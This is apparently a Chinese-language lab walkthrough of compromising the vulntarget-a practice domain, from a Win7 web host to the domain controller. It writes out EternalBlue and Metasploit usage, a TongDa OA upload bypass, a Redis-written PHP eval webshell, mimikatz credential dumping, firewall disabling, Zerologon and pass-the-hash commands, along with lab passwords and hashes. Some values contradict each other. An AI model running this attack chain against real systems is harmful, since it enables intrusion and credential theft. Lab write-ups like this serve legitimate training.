实验目标:拿下域控桌面
学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。
靶机下载:其中vulntarget-a为本次实验机器
百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
》》》靶机信息《《《
#攻击机
OS:Kali 2022
外NIC:192.168.x.x (桥接模式)(与Win7-PC主机进行通信)
#Web Server
OS:Windows 7
Hostname:Win7-PC
Server:通达OA 11.3
username:win7
password:admin
外NIC:192.168.x.x (桥接模式)(与Kali通信)
内NIC:10.0.20.98 (仅主机模式)(与Win2016主机即可域成员进行通信)(能够Ping通Win2016主机)
#域成员
OS:Windows Server 2016
Hostname:win2016
Server:PHPStudy+Redis
username:vulntarget\win2016
password:Admin#123
内NIC:10.0.20.99 (仅主机模式)(与Win7即WEB主机进行通信)(能够Ping通Win7-PC主机)
内NIC:10.0.10.111 (仅主机模式)(与Win2019即域控通信)(能够Ping通Win2019主机)
#域控
OS:Windows Server 2019
Hostname:win2019
Server:AD DC
username:vulntarget\administrator
password:Admin@666
内网NIC:10.0.10.110 (仅主机模式)(与Win2016即域内成员通信)(能够Ping通Win2016主机)
:::info
跨网段需要路由转发
:::
一:边界主机
方式一:MSF攻击
步骤一:拿到目标IP地址使用使用Nmap进行扫描…发现目标系统开发135和445端口且探测出为Win7sp1版本即可尝试使用永恒之蓝进行系统漏洞攻击…
┌──(root㉿kali)-[~]
└─# nmap -A -p- -Pn 192.168.50.148
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-15 15:43 CST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 87.50% done; ETC: 15:44 (0:00:09 remaining)
Nmap scan report for win7-PC (192.168.50.148)
Host is up (0.00035s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
110/tcp open pop3
| fingerprint-strings:
| GenericLines, HTTPOptions:
| +OK TDpop3Server 1.0 POP3 Server ready.
| -ERR An error occured
| NULL:
|_ +OK TDpop3Server 1.0 POP3 Server ready.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1188/tcp open hp-webadmin?
3336/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: WIN7-PC
| NetBIOS_Domain_Name: WIN7-PC
| NetBIOS_Computer_Name: WIN7-PC
| DNS_Domain_Name: win7-PC
| DNS_Computer_Name: win7-PC
| Product_Version: 6.1.7601
|_ System_Time: 2022-07-15T07:46:09+00:00
|_ssl-date: 2022-07-15T07:46:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=win7-PC
| Not valid before: 2022-07-14T05:45:24
|_Not valid after: 2023-01-13T05:45:24
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
8750/tcp open http nginx
|_http-title: 403 Forbidden
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49177/tcp open msrpc Microsoft Windows RPC
49183/tcp open msrpc Microsoft Windows RPC
49192/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=7/15%Time=62D11AAA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,29,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n")%r
SF:(GenericLines,40,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20rea
SF:dy\.\r\n-ERR\x20An\x20error\x20occured\r\n")%r(HTTPOptions,40,"\+OK\x20
SF:TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n-ERR\x20An\x20erro
SF:r\x20occured\r\n");
MAC Address: 00:0C:29:A4:85:26 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-07-15T15:46:09+08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -1h36m00s, deviation: 3h34m39s, median: 0s
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a4:85:26 (VMware)
| smb2-time:
| date: 2022-07-15T07:46:10
|_ start_date: 2022-07-15T07:37:31
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms win7-PC (192.168.50.148)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.63 seconds
步骤二:开启MSF并调用相应的模块与参数
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.42
lhost => 192.168.50.42
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.50.148
rhosts => 192.168.50.148
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
步骤三:直接执行命令会出现乱码,执行以下命令修改编码并开始收集信息…发现为高权限与双网卡
chcp 65001(65001 UTF-8代码页)
whoami
ipconfig /all
systeminfo
步骤四:在Meterpreter中抓取Hash值并进行解密…发现win7账户能够破解直接RDP链接…
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win7:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
方式二:WEB渗透
步骤一:通过方式一中使用Nmap对其扫描发现80端口开放通过浏览器访问发现为通达OA办公系统…访问以下链接可获取当前OA办公系统的版本号…为11.3…
http://192.168.50.148/inc/expired.php
步骤二:使用默认账号密码admin:空进行登录成功,可在后台进行GetShell,点击菜单>系统设置>系统参数设置>OA服务设置 发现Webroot目录为C:\MYOA\webroot\
步骤三:在菜单>系统设置>附件管理>存储目录管理>添加存储目录设置附件上传目录为 C:\MYOA\webroot\如下,点击添加…
步骤四:添加成功后点击组织>系统管理员在弹出的窗口中即可进行上传文件…开启BP进行抓包拦截…
步骤五:开启BP与浏览器代理并点击上图中的链接按钮选中要上传的一句话木马上传抓包,得到上传响应为Unicode编码并进行解码,解码后可以看到"禁止上传该类文件"为将PHP文件添加到了黑名单…
步骤六:可利用Windows操作系统的特性在保存文件的时候会去除掉文件后面的"."即上传文件名为"1.php."在文件保存的为"1.php"可对黑名单进行绕过…
步骤七:绕过后及要拿取shell路径为:HTTP请求包中module值/HTTP响应包正文中Id字段@后面四位数/后面数字.上传文件名.文件后缀名如下解释,访问并通过蚁🗡链接验证…
#HTTP请求包
POST /module/upload/upload.php?module=im HTTP/1.1
#HTTP相应包
{"id":"311@2207_1004038154,","name":"4pts.php.*","url":"\/inc\/attach.php?AID=311&MODULE=im&YM=2207&ATTACHMENT_ID=925772005&ATTACHMENT_NAME=4pts.php.","thumb":null,"link":"","icon":"\/static\/images\/file_type\/defaut.gif","state":"SUCCESS"}
#上传之后的路径
/im/2207/1004038154.4pts.php
#webShell地址
http://192.168.50.148/im/2207/1004038154.4pts.php
步骤八:也可使用通达OA综合利用工具直接GetShell…链接验证…
进度三:内网打点
步骤一:使用CS生成EXE程序在蚁剑中执行并上线…且将会话弹到MSF进行接收…
#CS端
创建Foreign HTTP类型的监听器,地址与端口都指向MSF
#MSF端
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.6
lhost => 10.0.43.158
msf6 exploit(multi/handler) > set lport 1234
lport => 5555
msf6 exploit(multi/handler) > run
步骤二:信息收集/迁移进程/抓取明文/关闭防火墙/
meterpreter>shell
chcp 65001 #设置为UTF-8代码页
net user #查看用户
hostname #查看主机名
ipconfig #查看网卡信息
systeminfo #查看信息信息
arp -a #查看内网通信主机
meterpreter>ps #查看进程信息
meterpreter>getpid #查看当前木马的进程信息
meterpreter>migrate 进程PID #将当前进程注入到其他进程中 选择64位的(隐藏木马程序)
meterpreter>load kiwi # 加载mimikazt
meterpreter>kiwi_cmd sekurlsa::logonpasswords #执行mimiakatz的命令/抓取明文密码
meterpreter>netsh advfirewall show allprofile state #查看防火墙状态
meterpreter>netsh advfirewall set allprofile state off #关闭防火墙
meterpreter>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f #使用注册表开启3389
load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用
#工具参数
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
注意问题:
- 在CS上反弹过来的Shell会话为32位,需要迁移进程到64位的System权限的进程中…
- Shell必须64位才能加载运行KIWI模块
步骤二:在MSF中添加路由设置代理…
:::info
添加路由
run autoroute -s 内网ip/24
run autoroute -p
查看路由设置
:::
#添加路由
use post/multi/manage/autoroute
set session 1
run
#添加代理
use auxiliary/server/socks_proxy
run
步骤三:扫描内网存活主机与开放端口
#扫描存活主机
use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.1-254
run
#扫描目标端口
use auxiliary/scanner/portscan/tcp
set ports 22-500,8000-10000
set rhosts 10.0.20.99
set threads 50
run
步骤四:配置proxychains的代理服务器并开始扫描内网主机…
#编辑Proxychains配置文件
vi /etc/proxychains4.conf
#配置信息
socks5 192.168.50.42 1080
//socks5 MSF地址 代理端口 账号 密码
#测试链接
proxychains curl http://10.0.20.99/
步骤五:MSF自带的代理模块进行大流量扫描时容易造成流量堵塞,需要使用其他软件来假设代理服务器,这里使用FRP进行Socks5代理服务器的架设…FRP项目地址:https://github.com/fatedier/frp/releases
#frps.ini
[common]
bind_port = 7000
#frpc.ini
[common]
server_addr = 192.168.50.42 #外网vps地址,即服务端地址,这里为MSF的地址
server_port = 7000 #与服务端建立连接的端口,需与服务端上的frps.ini保持一致
[plugin_socks]
type = tcp
remote_port = 8090 #配置攻击主机socks代理时的代理端口
plugin = socks5 #实战中使用socks5代理
use_encryption = true #是否使用加密
use_compression = true #是否进行压缩
#注意事项
配置文件中填写时需要把注释符号去掉
#服务端执行命令
./frps.exe -c frps.ini
#客户端执行命令
frpc.exe -c frpc.ini
步骤六:再去配置proxychains即可以使用Nmap直接开扫…或在WebShell上传Fscan进行内网扫描
Fscan项目地址:https://github.com/shadow1ng/fscan
#Nmap扫描
proxychains nmap -sT -Pn -P 10.0.20.0/24
proxychains nmap -sT -Pn -P 10.0.20.99
#fscan扫描
fscan.exe -h 10.0.20.0/24 -np #server2016是开了防火墙的,禁ping了,fscan需要加一个-np参数
#结果输出在当前目录下的result.txt
步骤七:发现内网主机10.0.20.99开放80与6379端口即WEB服务与Redis服务…开始漏洞扫描…
二:域内主机
步骤一:访问内网Web服务器并给FireFox挂代理访问测试…
步骤二:使用DirSearch对目标进行目录扫描…发现内网站点的探针文件…
#proxychains代理
proxychains dirsearch -u "http://10.0.20.99" -t 5
#dirsearch代理
dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:8090 -t 5
步骤三:尝试连接登录内网主机的Redis服务发现未设置密码,即可尝试写入一句话木马…Success
主要是因为配置不当,导致未授权访问漏洞。进一步将恶意数据写入内存或者磁盘之中,造成更大的危害,配置不当一般主要是两个原理:
- 配置登录策略导致任意机器都可以登录 redis。
- 未设置密码或者设置弱口令。
#Redis链接
proxychains redis-cli -h 10.0.20.99
#Redis写木马
config set dir C:/phpStudy/PHPTutorial/WWW/ #调整服务器配置路径
config set dbfilename 4pts.php #生成文件
set 1 "<?php eval($_POST['cmd']);?>" #写入文件
save #保存操作
步骤四:配置蚁🗡代理重启并链接Shell…
步骤五:拿到Shell后进行信息收集…
#执行命令
hostname
ipconfig /all
tasklist /svc
net time /domain
net group "Domain Computers" /doamin
net group "Domain Controllers" /domain
net group "enterprise admins" /domain
#收集信息
OS:Wins16
AV:Windows Defender
Domain:vulntarget.com
Domain Admins:Administrator
Domain Controller:WIN2019$
NIC:10.0.20.99/10.0.10.111
步骤六:生成正向Shell上传至蚁剑并执行且关闭防火墙,上线到MSF…
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f exe > inside.exe
netsh firewall set opmode mode=disable
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6666
set RHOST 10.0.20.99
run
步骤七:添加路由信息并使用Nmap进行信息收集…
#添加路由
use post/multi/manage/autoroute
set session 2
run
#域控判断
ipconfig /all -->获取DNS服务器地址:10.0.10.110
net time /doamian -->获取域控地址:win2019.vulntarget.com
ping win2019.vulntarget.com --> 返回地址:10.0.10.110
#Nmap扫描
proxychains nmap -Pn -sT -p 80,443,8080,445,139 10.0.10.110
三:域控服务
至此已经获取内网中域成员服务器也已经定位域控位置,接下来目标就是拿下域控,在此可直接尝试域控漏洞来进行权限提升:
- CVE-2020-1472
- CVE-2022–26923
- CVE-2021-42287&42278
这里尝试第一种域内提权手法…漏洞细节详细请看漏洞复现篇的文档
这里需要注意:将proxychains的代理配置改成MSF所起的代理信息…
步骤一:准备CVE-2020-1472与Impacket下载到Kali主机上…
#CVE-2021-1472
https://github.com/dirkjanm/CVE-2020-1472
#Impacket
https://github.com/SecureAuthCorp/impacket
#after downlad
python3 -m pip install -r requirements.txt
步骤二:尝试打空域控机器密码…
proxychains python3 cve-2020-1472-exploit.py win2019 10.0.10.110
步骤三:绑定通往目标域的Host文件信息并使用impactet获取域控的Hash信息…
#域名信息编辑
vi /etc/hosts
10.0.10.110 vulntarget.com
#impactet
proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:b08b7c0c6e4b64f435845e06ce465bc8:::
步骤四:使用抓取的Hash值横向倒域控的CMD下…
方式一:
proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
方式二:
proxychains python3 psexec.py vulntarget.com/administrator@10.0.10.110 -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
步骤五:使用John破解管理员密码…得出密码为Admin@@666
john --wordlist=./pass.txt ./hash.txt --format=NT
步骤六:开启RDP服务并在防火墙中添加规则对其放行…远程桌面链接!
#开启RDP
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#防火墙放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
#关闭防火墙
netsh advfirewall show allprofile state //查看状态
netsh advfirewall set allprofile state off //关闭防火墙
#远程链接
proxychains rdesktop 10.0.10.110
username:vulntarget\administrator
password:Admin@666
参考链接:
https://mp.weixin.qq.com/s/fgt0x8moCOL6lX7bCIT4Lg
https://blog.csdn.net/tlovejr/article/details/123706893
https://cloud.tencent.com/developer/article/1954759
510
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
